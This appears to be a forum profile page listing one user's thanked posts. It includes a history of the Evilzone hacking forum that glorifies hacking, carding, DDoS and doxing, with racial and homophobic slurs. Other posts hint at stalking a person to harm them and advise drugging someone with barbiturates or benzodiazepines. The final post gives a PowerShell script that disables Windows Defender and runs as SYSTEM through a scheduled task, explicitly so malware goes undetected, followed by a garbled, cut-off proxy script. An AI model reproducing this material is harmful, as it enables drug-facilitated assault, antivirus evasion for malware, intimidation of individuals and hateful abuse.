User Controls
Thanked Posts by Sophie
-
2022-09-07 at 7:09 PM UTC in The TRT Thread: Its the end of the world as we know it so GET WHOLESOME edition
Originally posted by aldra anyone know if epoxy resin (or fibreglass resin I guess) needs air to cure or if I can just pour it in an enclosed space and forget about it
It's the chemical reaction between the two compounds that does the hardening(IIRC). It is however an exothermic reaction so if you're going to let it set in an enclosed space you might want to pull a vacuum on it first.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-09-06 at 4:26 PM UTC in The TRT Thread: Its the end of the world as we know it so GET WHOLESOME edition
Originally posted by Kafka I’m completely fine cutting off anyone who is anti-abortion or feminism and if that turns out to be a majority of people here or you’re up to another sinister plot to sway me it will only drive me away.
Ah yes, my go to, sinister plots to change people's political opinions.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-02-17 at 2:59 PM UTC in EvilZone hacking forum is kill.It's founder was a Totse member you know.
Here is the story if you're interested.A brief history of Evilzone
Evilzone: A place of lulz, a place of trolls. It had everything, snitches, bitches, and nigger hitches. This story will be my account of Evilzone up until the present day. The dates and events may not be 100% accurate but I intend to retell this epic story like no other can… Just because, some things shouldn't be forgotten.
Totse Era: ? - 2006
By tracing our old founder's alias' [redacted] we come across a slew of activity which occurred around 2006. What was gone and thought forgotten is forgotten no longer, and hence we have a rare window into the mind that founded Evilzone. This tale begins at Totse . . .
Totse
If you don't know about Totse then I probably hate you, nevertheless I do feel a certain urgency to fill you in . . . Ah yes, Totse! Such great memories indeed; Totse was a wonderful community and all those who were a part of it can tell you it was something special. The Temple of The Screaming electron, as it was called, was a place of openness, revolution, and free speech. Notable boards included Better Living Through Chemistry (drugs), Bad Ideas (fraud), and for some of us Hacking & Security – which is where I first met our founder, who I will now dub “N.”
Totse was the first thing that would come up when you searched for “bomb making” in Google, and they were damn proud of it too. It was a community of outcasts and as a community they weren't very welcoming to new comers. Anyone who asked stupid questions was socially castrated, idiots and noobs weren't tolerated… Totse, in many respects, was a place just for the elite. It wasn't the kind of place open to helping people learn… like Evilzone was.
Totse operated from 1989 to 2009. It's closing was a great loss to the Internet; It's community and culture annihilated with the fragmentation of it's then legendary website. Many would later mourn the loss of such a great website, and shun the idiotic disorganization of it's closing, including yours truly… and though I resented such events, I never thought I would be a part of similar occurrences with the staff of Evilzone, years later… A fact I'm both sad and embarrassed to announce.
. . . and some things that should not have been forgotten were lost. History became legend. Legend became myth. And Totse passed out of all knowledge . . .
A look at N
2006 and Totse was still going strong. I decide to trace a then young N to gain some insight into his thought process and how Evilzone came to be founded. Here is what I found out.
. . .
For N's young age [redacted] he was a remarkably intelligent and curious person. We often forget that English wasn't his mother tongue… He seems to have picked up English, possibly just by talking to other hackers on the net. In addition to English, he spoke two other languages fluently and knew the basics of two more, including Greek.
His access to information was quite extraordinary. He knew all the best places to pick up things for free and enjoyed listening to lectures on a wide variety of subjects ranging from hacking to philosophy. It was his deep and genuine love of learning and curiosity that saw him become the hacker he is today. His ability to teach himself was one of his greatest strengths, something most hackers have in common.
The problem with the kids today is they don't undertake or understand autodidacticism. They've grown up in a society where what little they know is pre-chewed and tasteless ;) N was a stark contrast to the norm; Completely independent and capable of schooling himself in the esoteric art of the electron. N even chose his religion at a young age – when most kids are just going along with what their family believes – N was an Atheist, even in a society and culture where he was bullied for being so.
It's interesting to see the posts here about September 11, 2006. He was discussing whether or not 9/11 was an inside job. This was almost directly after it happened, there wasn't any band wagon yet, and the kid was still in school… yet he was already questioning, already thinking, at such a young age. While most Americans were busy taking George Bush' cock up their ass, N was attacking it with a sword. That kind of inquisitiveness and wit pervades his thinking. It is not surprising to find the boy interested in conspiracy theories and alternative views. Not in a crazy way, either – Something hard to find in that kind of scene.
Amongst this old data I find references to N being considerably older than he would otherwise have us believe. I consider this data and discard it; N was arrested not long ago, his official age was reported as 18, all other data supports my conclusions. Hence it was a lie, possibly so he could enter communities requiring him to be 18 years or older. He would do so many more times.
Of course, this wouldn't be the first time N would do something dishonest or immoral, for he was a notorious scammer . . .
N would hack websites and ask the owner to pay for the backups. Then he would place deface pages on them, advertising his hacking services (for a cost, of course.) From there, I can only assume people contacted him, and he would then trick them into installing a remote access tool. This allowed him to harvest credit card numbers which could be used for online purchases; He was certainly crafty.
This was the darker side of N, he loved scamming and fraud and worshiped the famous con artists. He lists here as his favorite movie “The Italian Job.” Not surprising, really.
N's small success at fraud was his doorway to the larger world of finance, both legitimate and illegitimate. N has been said by many to be “a financial genius” and in 2006 this is where it all began; He was heavily interested in finance. Some may even say obsessed. The web is testament to that, and it's littered with N's early attempts to make money.
I speculate that the only reason N started Evilzone was for the money. There is evidence suggesting he planned to make money from it via advertising but that never went anywhere because no advertising networks would have accepted a hacking website. That is also the reason why Evilzone doesn't have ads on it now.
Hacker's Heaven
Hacker's Heaven was the precursor to the Evilzone we all know and love today. It had a mono-chrome green look and feel with flaming text and a dizzying array of trojans, worms, viruses, root-kits, and tutorials to choose from. The closest analogy I have to Hacker's Heaven is the Vxchaos File Server… those who have seen this server will know what I mean.
Hacker's Heaven wasn't very popular and there isn't much to say about it. I don't know when exactly it was started, and all evidence of it's existence has been mostly erased from the web.
Evilzone.net Era: 2006 – 11 April 2007
Enter Evilzone.net; Evilzone.net was the start of a series of chain reactions that year which would later place Evilzone amongst some of the top hacking websites of the day. Our main characters here include Evil.!0 and N. Evil.!0 was N's vague friend and he was also the original owner of Evilzone.net. N convinced Evil.!0 to use Evilzone.net for a hacking forum, and so begun the legacy.
I first heard about Evilzone.net myself from a post on Totse. Something about that post intrigued me, so I decided to check out the forum and registered. At once, I was amazed by what was there. A whole board was dedicated exclusively to so called “freebies.” Freebies included anything and everything N felt like giving away and often this was r00t access to web servers. This place was wonderful, I thought, and so I gained access to my first “shell” there. These shells were impressive because you could literally do anything you could imagine to the web server. You could upload an email bomber, a proxy, create a DoS script, back door the website for accounts, host a botnet, anything you imagined, and N had hacked hundreds of websites and given away the shells all for free.
That was my first impression of Evilzone and it marked the start of the most epic marketing campaign for a website I think I've ever encountered…
Most people neglect to tell the story of how Evilzone became popular but to miss that is to do the story a great injustice, so I'd like to retell it: N had been hacking website after website, many of them high traffic, and posting backlinks to Evilzone. He was seeding promotional torrents, creating YouTube videos, spamming forums, chat rooms, email accounts… spreading worms… press releases… and the members were all doing the same. In short, it was the most aggressive marketing campaign I've ever seen, and it worked alarmingly well. By the end of 2007, Evilzone.net had more than 100,000 posts with hundreds of new members joining everyday.
Evilzone in those days was more black hat than anything you can possibly imagine. The members talked about credit card numbers so much that the term had to be shortened to “CCs” for convenience. Carding and fraud were a part of the culture, and so the freebies board found itself swimming with CCs. Every hacker was thrilled to be a part of Evilzone, the only “hacking” website where any hacking actually took place. Indeed, it was this blatant disregard for all laws that made Evilzone so great in the first place. You truly felt like literally nothing was off-limits – that's not to say you still wouldn't get banned for posting CP though.
Those were the glory days of Evilzone where it was still in the Goldilocks zone of not being so large as to gather the FBI's attention, yet not being so small that there was never anything going on. It was perfect, but perfect never lasts.
For one reason or another, N began to fight with Evil.!0, and they became enemies. The drama that marked this period was a wave file N released allegedly of Evil.!0 saying “Hello, my name is Evil.!0 and niggers fuck my ass and I am gay.” This was mass sent to every user on the forum (which was a considerable number of people at the time.)
… Which was the catalyst for the first great coup d'état in Evilzone history (though certainly not the last ;) ) – The hijacking of .Net to .Org.
The great coup: 11 April 2007 – 2008
One of the most turbulent eras in Evilzone history was the move to hijack Evilzone.net's user-base to Evilzone.org. N had initiated this coup over frustrations he held regarding Evilzone's management. I believe it might have been something like losing the main database due to unreliable hosting which set him off.
N's plan was essentially to lure all the old members to the new website with shiny new toys. The server was to be faster, with more bandwidth. There would be a dedicated torrent tracker, radio station, IRC server, and more. As any user will know, it is not the forum but the community which counts, and N was arguably the most important part of that community… With N now gone, I went after him like most people. Not because I was a sheep but because he was my friend. I didn't much like Evil.!0 anyway. He was never really a part of Evilzone, and didn't post much (if at all.)
I remember distinctly that Evilzone.net wasn't doing too well at this point. Possibly we had been DDoSed and encountered extended downtime. I recall it was kind of dead in the end. We were spamming Evilzone.net to bring new members to the website but there was nobody left to hear it…
Evilzone.org had to start from scratch, as far as marketing was concerned, and this time N was more aggressive and determined than ever. N, having already demonstrated his genius for marketing, enlisted his members to advertise on money, graffiti on walls, and tag websites in the name of Evilzone. Eventually, Evilzone.org ranked at the top of Progenics – a self-styled top 100 for hacking websites and a key target for recruitment.
N had achieved his goal, but N was the kind of guy who held grudges and he obsessively pursued anyone who had fucked with him over these past long years. The first he got even with was Evil.!0. He managed to turn the whole community against him. Evil.!0's reign was now over, and nobody was ever going back to Evilzone.net now, or Evil.!0, in fact… they couldn't, it was impossible – N had DDoSed Evilzone.net. The last of their users were therefore forced to give up, and reluctantly flocked to the new website.
Thus the coup had been successful, but it's backlash would be felt for years to come. You see, the takeover had angered many individuals. In the hacker world, this is extremely bad. Even in war you have the concept of mutually assured destruction or MAD but the two Evilzone's knew of no such concept. They were quite content to destroy themselves and anyone who was unfortunate enough to be caught in the cross-fire, and I believe one such member was H)(40R (that spells “haxor”, sir! (I couldn't read it then, lol).)
H)(40R was one of the stars of Evilzone. He was VIP, he posted useful content, seemed to know his shit, and was willing to help people. I liked the guy, and we were friends… I don't know what the fuck happened but H)(40r ended up snitching on Evilzone to the FBI. His email account had been hacked by N which uncovered irrefutable correspondence between him and the Feds. Understandably, this enraged N, and a fire burned inside of him.
He enlisted my support, and together we fucked H)(40R in novel ways. I believe we got his Internet account shutdown, and his house was raided. I don't recall, but one thing was sure: H)(40R, like Evil.!0, was now universally hated by Evilzone and was not coming back now, even if he wanted to. He later DDoSed Evilzone….
At this point, I'd like to apologize for a lack of citations, dates, and what not. Over time, much of the data has been destroyed in the conflict and all that remains are sketchy memories but I think if we collaborate, we can construct a more concrete history.
Following this point, another notable event occurred: The raiding of fellow member Xeross. Xeross was another star member of Evilzone and was also VIP. His house was raided by the Swedish Police when an Evilzone user uploaded some bad data to his server. I don't have any more info than that, unfortunately.
Let us also not forget the lulzy release of the Evilzone album by Odin, AKA “Cyberneticxmasghost” (“Yes, I'm a girl Sir :3”.) In this album, Odin chronicled the snitching of H)(40R in his hit song “Snitcher.” I am guessing from the lack of other tangible evidence that this drama was all that occurred from 2007 – 2008. Thus concludes the year.
Betrayals and lulz: 2008 – 2009
The stage is now set for Evilzone.org and it's up and coming stars are:
N – Founder of Evilzone. N is skilled at hacking, marketing, fraud, and finance. Administrator of Evilzone and loved by all.
Joepie91 – One of the great coders of Evilzone. Joepie91 is a homosexual Dutch man who codes in C#. Joepie91 was then a friendly and laid back guy, with many friends, but over the years has become sharp and jaded. Was once a black hat, now is an activist for open source.
Bubzuru – One of the great coders of Evilzone and universally respected for his great software. Creator of EvilVNC, Bubzuru Binder, Bubzuru Crypt, and countless other great software. Bubzuru is a skilled hacker and codes in a slew of languages including Borland C++, and X86 ASM.
Xzid – Notable assembly expert. One of the great coders of Evilzone. Like the former two, Xzid was respected and could be classed as 1337. He was a friend of mine but left Evilzone early on to return recently.
Cyberneticxmasghost – Lulzy hacker resembling The Joker. Odin was Evilzone's resident musician and created countless new original content. He is a skilled singer, artist, and hacker. He understand the way of chaos and lulz unlike most new to the art.
Satan911 – Current administrator of Evilzone. Satan911 is a veteran black hat who had many successful and noteworthy intrusions in the early days. His cracking skills were commended and provided the majority of the database dumps in freebies.
Ande – Current administrator of Evilzone. To be honest, I don't really remember that much about ande in those days. He's perhaps most known today for his take over of Evilzone. A strange turn of events, really.
Shwack13 – The biggest script kiddie of Evilzone. Doesn't know any programming languages. He can't even code HTML.
Dark Coke – Another cracker type. Together with Satan911 they dropped more DB's then your mum sucking cocks on a busy street corner.
HoaX – Good at doxing and haxing. Evilzone VIP.
Jmscobera - The god of porn.
hacker@sr.gov.yt– Blackhat with countless intrusions and the 1337 email to prove it. This guy has been around forever.
Hanorotu – Deserves an honorable mention. Back in the day we experimented with sleep deprivation to see what would happen.
Turkish OG – Some faggot who DdoSed Evilzone.
Stathis – Former Administrator of Evilzone. Stathis was really cool and he knew a lot about security and hacking but he was more the sysadmin type.
Fox – My closet friend :3 He was then known by another name but I don't recall.
Stateofhack – Former Totse elite and member of the Totse Phoenix. Stateofhack is moderator on Zoklet.
Roenhayden – Another Totse user. I don't know what happened to him, but he knew more about hacking, security, and chemistry than anyone I've ever met.
&T – One of the administrator who came from Totse.
And anyone I just can't remember!
To be continued….
I need clarifications on the bellow events:
H)(40R – Snitches on Evilzone to the FBI.
Turkish_OG - DdoS' Evilzone
ViraL – ViraL AKA Ryan Cleary, alleged member of Lulzsec joins Evilzone through Odin.
Shwack13 - “Hacks” Evilzone, dumps the database, psychopain killer.
? - Singletrackworld fiasco.
Joepie leaves to start null nation
ViraL – DdoS us
Sirholms – Sucide hoax
Ande
A look at Evilzone today
It's hard to believe it's only been 6 years since this all started. Since then, a lot has changed. The website has undergone revision after revision, changes in staff, membership, and constant conflict to reach the point it's at now. We see Satan911, and Ande, along with Kulverstukas have stuck with Evilzone and are the current administrators.
I haven't really been following much but . . . I see originally, Ande pushed to try transition Evilzone from it's dark days into a legitimate security community. All of us thought originally, that this was the best move. It was reasoned that for Evilzone to continue to exist it needed to change from it's old ways into a more whitehat community. Not realizing, of course, that for this to occur also implied the necessary destruction of Evilzone which is the reason why so few members remain.
I have witnessed Ande's remarkably stupid decisions and indecisiveness in running this place. I am basing this on the following events:
Close forum.
Open blog
Decide forum was actually good
Reopen forum
No that actually sucked, close forum again, IRC is 1337
Decide to open forum again
No, open new hacking community, Evilzone sucks
Close it, it actually sucked
Herp fucking derp, I wish I was joking
If I didn't know any better, I'd say Ande was trying to kill Evilzone on purpose, I suggest he may be suffering from a stroke here. But I guess, that's just the way it is. As retarded as it is, it's human nature for us to think that we're competent when we're not. It's obvious Evilzone had no choice but to die when the wrong leader took control.
It is my opinion that Ande lacks the necessary skill and drive to run Evilzone. True, I may never have liked Ande much. In fact, I don't think a person with such poor English skills is fit to run an English website by definition, but that doesn't bias me from stating facts. The fact of the matter is, N was one of few people capable of keeping the website prosperous, even in such turmoil. Ande on the other hand, lacks the necessary skills. This is evident by the website's current decline.
I wonder if he has even tried to promote the website once since he took over? This isn't field of dreams, people aren't going to come just because it's here, and I certainly don't think they will stay with Ande as the Administrator (lol, no offense, free speech man.)
… and so, that brings us back to present day Evilzone, where I have no choice but to watch the website I once loved die… all because of petty pride and incompetence. You can ban me if you like, the truth is, you know I'm right and Ande should be embarrassed at the state of things. I know I would be.
Thanks for reading.
And that's the end of that.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-09-06 at 3:23 PM UTC in List of users I have defeated:The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-09-05 at 3:51 AM UTC in Crime! Crime? Breaking and entering.On topic:I've calmed down, which usually makes me stop and think for a second and go: Maybe i shouldn't end this person, or: Maybe i shouldn't set fire to a block of houses because there is one person i want torched living there. And sometimes: Maybe i shouldn't be standing here inconspicuously getting a feel for an area and note this person's routine for use at a later date.
I am however going to send a message and he is not going to like it. Everything has been meticulously prepared. -
2022-09-05 at 3 AM UTC in Best & Worst User on this site (Opinions)
Originally posted by lockedin Best: Sudo, Sophie, Nile, aldra, mmQ
Worst: G0llum, Spectral, Speedy, Hikki, WellHung, Polecat, stl1
I'd substitute my handle with yours in that list. I also kinda like troon even though he thinks i'm spawn of the devil. But that's ok. Like Sudo who'd shoot me IRL if he could. But he's just a likeable person.
Hikki is a suicide or a mass shooting waiting to happen. If i were a betting man, i'd put money on self delete.
The other people you mentioned i don't particularly dislike as people i dislike their shtick. But stl1 has no redeeming qualities.
Shout out to Richard Burnish. And of course; got murder on my mind 24/7, bless, bless, to all my niggas up in heaven,The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-31 at 4:29 AM UTC in The TRT Thread: Its the end of the world as we know it so GET WHOLESOME editionThe following users say it would be alright if the author of this post didn't die in a fire!
-
2022-08-27 at 9:18 PM UTC in Rethinking Cryptocurrency as a TechnologyPublic/Private key pairs. You get a set one public key one private key. Read about key pairs. Also a website is open, but the point is that only the operator has full access to read and to write to their website.
It's fundamentals, but you need to understand them.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-27 at 9:01 PM UTC in List of confirmed mommas bois on NISMy mom thought having a kid with my dad was a good idea. Lol. Lmao.The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-08-21 at 3:41 PM UTC in Im hurt as wellI don't care about your well being.The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-08-21 at 2:15 AM UTC in An Apparently To Alert You Of A Sim-Swap Attack
Originally posted by SBTlauien It doesn't take much info. Just a phone number and 'maybe' the name on the account. Usually they want an email address that they can access using this phone number via a One-Time-Passcode. Any other accounts they can access using this phone number would work.
They usually find out what mobile carrier is being used, call one of the local stores and social engineer a Rep into swapping that phones service to another phone. They call the mobile carrier directly and change it as well.
Once they have control of the phone number, they can then use it to reset passwords.
At my job, if we send someone a passcode to their phone, and they confirm it, they are authenticated to the highest. I work for a bank.
Got it. Find out how your number keeps popping up on their radar. Also this gave me an idea for the blue team. You could probably honeypot these people by strategically leaking certain numbers tied to a special operations center, basically a couple servers simulating the kind of access they are after. Stick and carrot them to keep them around long enough to see if and when they fuck up.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-21 at 7:48 PM UTC in The TRT Thread: Its the end of the world as we know it so GET WHOLESOME edition
Originally posted by Sudo Yeah and he's got a country wide warrant but he has a family member who is in a position of trust with a sports team who likely helped him flee the country. I met him before and got snakey vibes off him and I feel like my friend knew too. I saw my friend 24-36 hours before he died and he said he wasn't hanging with him anymore and wasn't going to the town he ended up dying in. I hate that butterfly effect feeling where the smallest thing could have changed the finality of someone's existence. There should be a name for that feeling. Jimi hendrix syndrome or something
It's called survivors guilt. And there was no way for you to tell the future. It happens a lot to loved ones of someone that ends up committing suicide. They think: If only i had listened better. If i only had said this one thing. The thing is, sometimes this is just the way things go, no matter what you say, no matter what you do. And The Past has past.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-20 at 2:30 PM UTC in Can I put some Klonopin in a soda?
Originally posted by Bradley Ya benzos are
Most of them are lipophilic i seem to recall. Meaning they like to dissolve in fats and oils and such. Having a particulate suspension of a solid does not equal dissolved. It dissolves okay in ethanol AKA likkah, if you got vodka, warm it up not over an open flame ya dingus in the microwave. When it's not quite toasty but getting there it will dissolve benzos reasonably well.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-20 at 2:24 PM UTC in Can I put some Klonopin in a soda?If you're gonna roofy someone might as well use barbiturates, a lot of them come as a syrup preparation already. Makes for more precise volumetric dosing as well, which is essential because barbs will kill a person.The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-08-20 at 1:03 PM UTC in The TRT Thread: Its the end of the world as we know it so GET WHOLESOME editionYou were supposed to be the chosen one, America. Shining city on the hill, bastion of liberty and all that. Look at you now, just look at the absolute fucking state.The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-08-20 at 12:17 PM UTC in Is there any way to make Klonopin kick in faster?You could honestly just rack a line. People say benzos don't have any bioavailability intranasally but people say a lot of things and they'd be wrong.
In any case like when you sublingual it the binder is the component that will slow absorption. One time i had these ampules of Midazolam and i really don't like to IV because for one i hate needles and i will most likely overshoot the vein first time. So unless it's morphine ampules, it's not worth it for me. but i wasn't not going to take the Midazolam.
I ended up drawing the solution into a syringe and blasting all of it straight into the mucous membranes of my nose. And it surprised me how fast it hit.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-20 at 12:51 PM UTC in What to watch on Netflix?
Originally posted by aldra if you like Korean stuff I thought The Kingdom was pretty good, medieval zombie period piece
also Mindhunter, detailing the FBI's first forays into investigating serial killers, I just wish they made more of it
Yee, i realy liked Mindhunter too. Something that stuck out to me is the dude they cast to be Ed Kemper, if you showed me an out of context picture of the dude and asked who's that i'd swear it'd be Ed Kemper.
Also they were building up big time for BTK to be the big bad next season, but the next season never came.
Haunting of Hill House was pretty cool, the scares and spooks were alright but funeral episode was a more refined sort of horror. Dunno if you've seen it, but that episode sticks out in my mind not for how scary it was, it just made me feel really uncomfortable, it was the opposite of fun. But in a good way.The following users say it would be alright if the author of this post didn't die in a fire! -
2022-08-20 at 12:48 AM UTC in Windows Defender is the worst and i'm going to kill it.That's right it's another issue of Sophie's Cyber Shenanigans[Anti Telemetry(Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.
Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.
However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.
If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.
Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.
##-!NOTICE!-##
# You may want to give this a look over if you simply want to maim
# not kill Windows Defender
Write-Host "[+]If you don't know what you're doing, stop executing this script." -f 'gre'
Read-Host "If you do know, press any key to continue..." -f 'gre'
try {
New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft'-Name "Windows Defender" -Force -ea 0 | Out-Null
# Pretty self explanatory
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
# This is the kind of shit Windows gets up to when it thinks you're idling
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
# Spynet? No, doesn't seem suspicious to me guvner, honest
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
# Windows assumes consent, don't touch my freaking samples bro. Not cool
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
# No one needs to know...
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
# These features can die in a fire, look it over in case you'd like to comment
# out some lines if you wanna play it safe, i like living on the edge
if (-Not ((GetWmiObject -class Win32 OperatingSystem).Version -eq "6.1.7601")) {
Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableRealTimeMonitoring $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
Set-MpPreference -EnableControlledFolderAcces Disabled -Force -ea 0 | Out-Null
Set-MpPreference -EnablenetworkProtection AuditMode -Force -ea 0 | Out-Null
Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
Set-MpPreference -SubmitSampleConsent NeverSend -Force -ea 0 | Out-Null
Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
}
} catch {
Write-Warning "Failed to disable Windows Defender component"
}
# If this errors out you either don't have the right permissions or the service has already been stopped
try {
Get-Service WinDefend | Stop-Service -Force
Set-itemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -name "Start" -Value 4 -Type DWORD -Force
} catch {
Write-Warning "Failed to disable WinDefend Service"
}
Make a text file and paste the code block. Save it as something like windef.ps1.
I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that(Kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this
schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System
Change the details as necessary.
If you want to take this a step further save the following as a .bat file and run it as administrator. This script was apart of the original ensemble i had in a previous anti-telemetry thread
@ECHO OFF
SETLOCAL
echo Uninstalling updates relevant to telemetry ops
echo Delete KB2902907 (Microsoft Security Essentials)
start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart
echo Delete KB3022345 (telemetry)
start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart
echo Delete KB3068708 (telemetry)
start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart
echo Delete KB3080149 (Telemetry)
start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart
In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.
Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.
Here's my implementation of a HTTP server in powershell.
# PowerShell RegEdit and HTTP Server
$registryPath = "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\"
$Name = "EnableLegacyAutoProxyFeatures"
$value = "1"
# Check to see if an entry exists and set value
# If it doesn't create the appropriate subkey
if(!(Test-Path $registryPath)) {
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $value `
-PropertyType DWORD -Force | Out-Null
}
else {
New-ItemProperty -Path $registryPath -Name $name -Value $value `
-PropertyType DWORD -Force | Out-Null
}
# Http Server
$http = [System.Net.HttpListener]::new()
# Listen at 8080
$http.Prefixes.Add("http://localhost:8080/")
# Start the Http Server
$http.Start()
# Confirm
if ($http.IsListening) {
write-host " HTTP Server Listening " -f 'gre'
write-host " Please direct Windows Auto Proxy Config to http://127.0.0.1/:8080 " -f 'gre'
}
# Server Loop
while ($http.IsListening) {
$context = $http.GetContext()
if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {
# Log to terminal
write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'gre'
# Get proxy.pac data
# Don't forget to change this to reflect the situation at your end
[string]$data = Get-Content "C:\some\path\proxy.pac" -Raw
# Field the request
$buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
$context.Response.ContentLength64 = $buffer.Length
$context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
$context.Response.OutputStream.Close() # Close
}
Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.
script type="application/x-ns-proxy-autoconfig">
// Declare vars
var normal = "DIRECT";
var blackhole = "PROXY 127.0.0.1:55555";
function FindProxyForURL(url, host) {
if (dnsResolve(host) || shExpMatch(host, '*.local')
|| isInNet(dnsResolve(host), '10.0.0.0', '255.0.0.0')
|| isInNet(dnsResolve(host), '172.16.0.0', '255.240.0.0')
|| isInNet(dnsResolve(host), '192.168.0.0', '255.255.0.0')
|| isInNet(dnsResolve(host), '127.0.0.0', '255.255.255.0')) {
return normal;
}
if (shExpMatch((url, "*oca.telemetry.microsoft.com*")
|| shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
|| shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
|| shExpMatch(url, "*a-0001.a-msedge.net*")
|| shExpMatch(url, "*a-0002.a-msedge.net*")
|| shExpMatch(url, "*a-0003.a-msedge.net*")
|| shExpMatch(url, "*a-0004.a-msedge.net*")
|| shExpMatch(url, "*a-0004.a-msedge.net*")
|| shExpMatch(url, "*a-0005.a-msedge.net*")
|| shExpMatch(url, "*a-0006.a-msedge.net*")
|| shExpMatch(url, "*a-0006.a-msedge.net*")
|| shExpMatch(url, "*a-0007.a-msedge.net*")
|| shExpMatch(url, "*a-0008.a-msedge.net*")
|| shExpMatch(url, "*a-0009.a-msedge.net*")
|| shExpMatch(url, "*i1.services.social.microsoft.com")
|| shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
|| shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
|| shExpMatch(url, "telemetry.appex.bing.net*")
|| shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
|| shExpMatch(url, "*pre.footprintpredict.com")
|| shExpMatch(url, "*aidps.atdmt.com*")
|| shExpMatch(url, "*aka-cdn-ns.adtech.de*")
|| shExpMatch(url, "*a-msedge.net*")
|| shExpMatch(url, "*b.rad.msn.com*")
|| shExpMatch(url, "*az361816.vo.msecnd.net*")
|| shExpMatch(url, "*b.ads1.msn.com*")
|| shExpMatch(url, "*b.ads2.msads.net*")
|| shExpMatch(url, "*watson.telemetry.microsoft.com*")
|| shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
|| shExpMatch(url, "*bs.serving-sys.com*")
